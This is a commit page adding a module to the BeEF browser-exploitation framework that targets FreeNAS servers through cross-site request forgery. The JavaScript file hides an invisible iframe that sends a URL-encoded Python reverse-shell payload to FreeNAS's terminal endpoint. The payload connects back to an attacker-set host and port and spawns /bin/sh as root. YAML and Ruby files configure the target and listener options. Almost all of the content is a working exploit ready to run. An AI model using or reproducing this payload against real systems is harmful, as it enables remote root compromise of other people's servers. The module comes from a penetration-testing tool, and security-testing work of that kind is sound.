Added FreeNAS remote reverse root shell CSRF module
For more information see: http://support.freenas.org/ticket/1788
This commit is contained in:
bcoles
@@ -0,0 +1,34 @@
|
|||||||
|
//
|
||||||
|
// Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||||
|
//
|
||||||
|
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
// you may not use this file except in compliance with the License.
|
||||||
|
// You may obtain a copy of the License at
|
||||||
|
//
|
||||||
|
// http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
//
|
||||||
|
// Unless required by applicable law or agreed to in writing, software
|
||||||
|
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
// See the License for the specific language governing permissions and
|
||||||
|
// limitations under the License.
|
||||||
|
//
|
||||||
|
beef.execute(function() {
|
||||||
|
var rhost = '<%= @rhost %>';
|
||||||
|
var rport = '<%= @rport %>';
|
||||||
|
var lhost = '<%= @lhost %>';
|
||||||
|
var lport = '<%= @lport %>';
|
||||||
|
var sid = Math.floor(Math.random()*1000)+1;
|
||||||
|
|
||||||
|
var freenas_add_user_iframe = beef.dom.createInvisibleIframe();
|
||||||
|
freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d');
|
||||||
|
|
||||||
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||||
|
|
||||||
|
cleanup = function() {
|
||||||
|
document.body.removeChild(freenas_add_user_iframe);
|
||||||
|
}
|
||||||
|
setTimeout("cleanup()", 15000);
|
||||||
|
|
||||||
|
});
|
||||||
|
|
||||||
@@ -0,0 +1,28 @@
|
|||||||
|
#
|
||||||
|
# Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||||
|
#
|
||||||
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
# you may not use this file except in compliance with the License.
|
||||||
|
# You may obtain a copy of the License at
|
||||||
|
#
|
||||||
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
#
|
||||||
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
# See the License for the specific language governing permissions and
|
||||||
|
# limitations under the License.
|
||||||
|
#
|
||||||
|
################################################################################
|
||||||
|
# For more information see: http://support.freenas.org/ticket/1788
|
||||||
|
################################################################################
|
||||||
|
beef:
|
||||||
|
module:
|
||||||
|
freenas_reverse_root_shell_csrf:
|
||||||
|
enable: true
|
||||||
|
category: ["Exploits", "NAS"]
|
||||||
|
name: "FreeNAS Reverse Root Shell CSRF"
|
||||||
|
description: "Attempts to get a reverse root shell on a FreeNAS server.<br/>Tested on version 8.2.0 however other versions are likely to be vulnerable."
|
||||||
|
authors: ["bcoles"]
|
||||||
|
target:
|
||||||
|
working: ["ALL"]
|
||||||
@@ -0,0 +1,37 @@
|
|||||||
|
#
|
||||||
|
# Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||||
|
#
|
||||||
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
# you may not use this file except in compliance with the License.
|
||||||
|
# You may obtain a copy of the License at
|
||||||
|
#
|
||||||
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
#
|
||||||
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
# See the License for the specific language governing permissions and
|
||||||
|
# limitations under the License.
|
||||||
|
#
|
||||||
|
################################################################################
|
||||||
|
# For more information see: http://support.freenas.org/ticket/1788
|
||||||
|
################################################################################
|
||||||
|
class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
|
||||||
|
|
||||||
|
def self.options
|
||||||
|
configuration = BeEF::Core::Configuration.instance
|
||||||
|
lhost = "#{configuration.get("beef.http.host")}"
|
||||||
|
lhost = "" if lhost == "0.0.0.0"
|
||||||
|
return [
|
||||||
|
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
|
||||||
|
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
|
||||||
|
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
|
||||||
|
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def post_execute
|
||||||
|
save({'result' => @datastore['result']})
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
Reference in New Issue
Block a user